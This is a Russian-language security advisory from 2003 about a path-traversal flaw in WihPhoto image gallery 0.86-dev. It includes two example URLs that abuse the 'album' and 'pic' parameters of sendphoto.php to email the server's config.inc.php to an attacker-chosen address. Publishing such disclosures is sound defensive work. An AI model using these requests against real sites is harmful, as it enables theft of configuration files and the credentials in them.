Доступ к произвольным файлам в WihPhoto image gallery

Дата публикации:
27.02.2003
Всего просмотров:
795
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности ввода обнаружена в WihPhoto image gallery. Удаленный атакующий может просматривать произвольные файлы на системе с привилегиями Web сервера.

Уязвимость присутствует в нескольких сценариях, использующих переменные album' и 'pic'. Пример (посылает по почте файл 'config.inc.php'):

http://[target]/sendphoto.php?album=.&pic=../config.inc.php&sendto=[E-MAIL]&filled=1 

http://[target]/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1

Удаленный пользователь может достигнуть того же самого эффекта, представляя специально обработанную Web форму вместо HTTP GET запроса.

Уязвимость обнаружена в WihPhoto Image Gallery 0.86-dev

Ссылки: WihPhoto Bug

или введите имя

CAPTCHA